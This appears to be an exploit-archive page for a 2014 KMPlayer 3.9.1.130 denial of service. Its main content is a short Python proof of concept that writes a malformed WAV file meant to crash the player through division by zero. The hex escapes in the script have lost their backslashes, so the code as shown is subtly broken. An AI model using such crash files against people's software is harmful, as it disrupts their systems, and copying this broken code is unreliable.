Home / exploitsPDF  

KMPlayer 3.9.1.130 Denial Of Service

Posted on 25 November 2014

# Exploit Title: KMPlayer 3.9.1.130 Integer division by zero DoS. # Date: 25-11-2014 # Author: Ajin Abraham # Website: http://opensecurity.in # Vendor Homepage: http://www.kmpmedia.net/ # Software Link: http://filehippo.com/download_kmplayer/download/7f497da5a4cda4032bf7e4a11c9e3131/ # Version: 3.9.1.130 # Tested on: Windows 7,8, 8.1 header = ("x52x49x46x46x64x31x10x00x57x41x56x45x66x6dx74x20" "x10x00x00x00x01x00x01x00x22x56x00x00x10xb1x02x00" "x04x00x00x00x64x61x74x61x40x31x10x00x14x00x2ax00" "x1ax00x30x00x26x00x39x00x35x00x3cx00x4ax00x3ax00" "x5ax00x2fx00x67x00x0a") exploit = header exploit += "x41" * 800000 try: print "[+] Creating POC" crash = open('fuzz.wav','w'); crash.write(exploit); crash.close(); except: print "[-] No Permissions.."

 

TOP